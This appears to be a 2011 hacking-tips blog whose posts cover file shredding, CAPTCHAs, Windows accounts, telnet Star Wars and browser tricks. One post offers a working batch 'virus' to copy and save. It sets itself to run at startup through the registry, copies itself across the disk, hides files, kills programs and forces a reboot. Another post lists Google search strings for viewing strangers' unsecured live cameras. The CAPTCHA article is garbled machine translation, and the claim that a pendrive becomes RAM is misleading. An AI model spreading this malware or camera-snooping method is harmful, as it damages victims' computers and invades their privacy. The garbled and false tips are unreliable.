Wednesday 13 July 2011

DELETING files beyond recovery................


There are many free digital file shredders out there but here i bring you the easiest, smallest & fastest...................
An ordinary deleting of files isn't enough! When you wish to delete any sensitive information, like industrial secrets , transaction details and hacking tracks, you want to be sure that it will be deleted permanently. Sorry to say, there are plenty recovery tools that can restore your deleted items. If you need to destroy any data and eliminate any possibility of its restoration you need a "shredder". This software destroys the data you choose before the deletion, using a complicated procedure of filling the actual content with random data.
Freeraser can function on three levels:

  • a fast destruction (standard 1-round filling of random data)
  • a forced destruction (3 rounds of filling according to DoD 5220.22M standard)
  • an ultimate destruction (35 rounds of filling with data according to Guttman algorithm).

What Is A CAPTCHA, And How Does It Work?

CAPTCHA or Captcha (pronounced ch-Cap-uh), meaning "completely automated public Turing test to tell computers and people outside" is a form of provocation test / answer to ensure that the response is generated only by those and not a computer. In simple terms, the CAPTCHA word verification you will encounter at the end of a registration form when you signed up for Gmail or Yahoo. The following image shows typical examples of CAPTCHA. Almost all Internet users will experience in their daily use CAPTCHA, but few are aware of what it is and why they are used. So in this post, you will find detailed information on how the CAPTCHA works and why they are used. What is the exact purpose CAPTCHA Served? CAPTCPA is mainly used to prevent software robots (bots) to take action on behalf of the real man. For example, when you open a new mail account, you will find a CAPTCHA to the end of the registration form to ensure that the form is filled out by a legitimate interest of men and not automated software or computer bot. The main purpose of CAPTCHA is to propose a test that is simple and easy for any human being to answer, but for a team, it is almost impossible to solve. How to create a test that can tell Computers and Humans Apart? For many CAPTCHA may seem silly and boring, but in reality it has the ability to protect systems against malicious attacks, where people try to game the system. Attackers can use automated software to generate a huge amount of applications, which causes a high load on the target server, which could degrade the service quality of a given system, whether due to expenses or abuse of resources. This could affect millions of users and their legitimate demands. CAPTCHAs can be deployed to protect systems vulnerable to spam e-mail, such as services from Gmail, Yahoo and Hotmail. Users that CAPTCHA? CAPTCHAs are primarily used by sites that offer services such as online surveys and registration forms. For example, offers Web-based email services like Gmail, Yahoo and Hotmail free e-mail accounts for their users. But each registration process, CAPTCHAs are used to prevent spammers from using a bot to generate hundreds of spam e-mail accounts. Designing a system CAPTCHA CAPTCHA has been designed so that the computer does not have the ability that people have when it comes to processing visual information. It 's easier to allow people to view photos and collect models such as the computer. This is because computers are missing a real intelligence, that people have by default. CAPTCHA implementation by users of the image, which has been distorted or occasionally stretch marks, only that people should be able to identify. Sometimes the characters are deleted or presented in a noisy environment is more difficult for computers to find patterns. Most but not all, CAPTCHAs rely on visual evidence. Some web sites implement a CAPTCHA system completely different to tell humans and computers together. For example, a user is presented with four images containing three photographs of animals and containing a flower. The user has to select only those images that contain the animals in them. The Turing test can be easily solved by any human being, but almost impossible for a computer. Breaking the CAPTCHA The challenge is to break the CAPTCHA really hard to teach the computer how to process information the same way as people think. Algorithms and Artificial Intelligence (AI) was designed for the computer to think like people, when it comes to images of textures. However, no general algorithm that can go through and break the CAPTCHA system, and then each algorithm CAPTCHA must be dealt with separately. It might not work 100 percent of the time, but it can work all the time that spammers the trouble.

How To Set Up Multiple Users On A PC

Setting up separate accounts on a shared PC would help to retain documents as images and organized labor, and it will be much easier to follow both the duties of tomorrow and the budget proposal next week .

Step By Step

1. Click the Windows orb to open the Start menu, then click Control Panel.

2. If you are using Classic View, click the icon called User Accounts. " Usually accompanied by an icon of two cartoons. If you use the new control panel is standard on Vista and Windows 7, click on Add or remove user accounts ", the text in the User Accounts and Family Safety" section. This takes you to Manage Accounts screen, allowing you to change your user accounts after adding

3. Click "Create a new account" in the large text box that shows the current users.

4. Label a new account name. Give each user account name that accurately describes what it once was. For example, if an account is intended for adults and children, the label of the new account "Kids". You can also create an account for household use, such as games or sending an e-mail, and the second part of work-related enterprises.

5. Select an account type. There are two options, the standard account and the account administrator. standard account can use the software and install and remove programs, but they can not make changes that affect all users, or which may compromise the safety of your computer. Admin accounts have full control of your computer, but may require password authentication to prevent unwanted changes to the system.

6. Add a password for your account by clicking the desired account in the Account Management screen. Click "Create a password" text, then type the appropriate information in the appropriate boxes. Click Create password to complete the process. a password and change the access settings.

Monday 11 July 2011


This one is a simple batch virus
Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Be carefull & Don't run this on ur pc

@Echo off
color 4
title 4
title R.I.P
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
start calc
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
time 12:00
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer

How to Hack into a Live Security Camera

Well this is an interesting article. It is a sub-section of a Hacking Technique known as “Google Hacking”. All what we are looking at are unsecured cams from around the world that are interfaced with the internet. So how do you find such cameras. Just search these following strings in Google and select any result. Whoa, you can see a live cam on your PC screen!! The strings are given below:

intitle:”Live View / – AXIS
inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
intitle:”live view” intitle:axis
allintitle:”Network Camera NetworkCamera” (disconnected)
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210?
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image” (disconnected)
intitle:”i-Catcher Console – Web Monitor”

Happy Cam Hacking Guys!!
Enjoy The Hack.......

You wanna know who used your PC in your absence

Who Used Your Pc In Your Absence,what Did He Do?

first you should go

"start > run >eventvwr.msc"

Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.
Look for a date and time when you weren't home and your computer should have been off.
double click on the eg: info n it will show u the detail.
You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.
Hope u all will like it.

Friday 8 July 2011

Trick To Watch Stars Wars Movie In DOS

Trick To Watch Stars Wars Movie In DOS
Sometime back someone decided to create  ‘Star Wars Episode IV: A New Hope’ in command line interface so that you can watch it on DOS .There is no sound associated with this movie but the dialogues are written alongside the screen.It is real fun to watch starwars movie in DOS.This trick requires that you should have internet connection.As this trick is in command line interface so it doesn’t need high speed internet connection and  even dialup connections will work smoothly.
This tricks works on windows xp,vista,windows 7, UNIX, Linux, Mac, Solaris, Beos or any other system that uses telnet client.I will explain this trick only for xp,vista and windows 7.Linux geeks can use it easily.
I have divided this trick into two steps.Step 1 is required only for windows vista and windows 7 users.Step 2 should be performed by windows vista,7 as well as xp users.
Step 1 (Skip if you are using Windows xp):-

In this step we will enable telnet client in windows 7 and vista (it is enabled by default in windows xp)
1. Click Start then goto Control Panel.
2.Click on the sub heading Uninstall a program under the main heading Programs
(NOTE: IF you are in the Classic View click on Programs and Features.)
3. Select Turn Windows features on or off.
4. Select the Telnet Client option.
5. Click OK.
6. A dialog box will appear to confirm installation.
Step 2:-
1.Click on start button
2.Goto Programs->Run (or press Window key+R)
3.Paste the command below in Run
4.Press enter and enjoy the movie J

Funny Trick To Hack Facebook

If you really want to impress someone with your hacking skills then this trick will surely help you.Well this is actually not any hacking just a simple javacript trick but the other person will surely believe you as a hacker.
So what can you do with this trick?
You can edit content of any website including facebook,myspace,twitter etc.For instance see the pic below
facebook hack1 Funny Trick To Hack Facebook
How to perform this trick?
Open any website of your choice (like facebook) in  browser (internet explorer,google chrome,firefox) and clear the address bar of the browser.
Copy paste the following javascript code in the address bar of your browser
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0;
And thats it.Now you can edit anything that is written on the page.
How this trick actually work?
This is a javascript code on the the browser side.It is temporary and the changes will be gone once you refresh the webpage.
The javascript code JavaScript:document.body.contentEditable=’true’; makes the website editable in your browser.
The code document.designMode=’on’ tells the browser to turn the designmode on
The code void 0 tells the browser not to show any error
So, enjoy this funny trick to hack facebook

Saturday 2 July 2011

Use Pen drive As RAM !!

Here is the required procedure for converting USB/pendrive memory into RAM manually…

1) Plug your pendrive into PC/laptop.

2) Right Click On My Computer.

3) Open up properties.

4) Go to Advanced Option.

5) Now select Settings of Performance.

6) Again Click on the Advanced Button which is shown In the popup Window.

7) Now click on Change button shown in Virtual memory.

8) Now select the available memory of your removable USB/Pendrive.

9) Set the value and apply the changes.

... yes it is possible all the memory available in a removable pendrive/USB can be converted into RAM to increase the working speed of the computer.

Manual Method to Convert USB/Pendrive Into RAM ...

10) Restart your PC/Laptop and Thus you are done.

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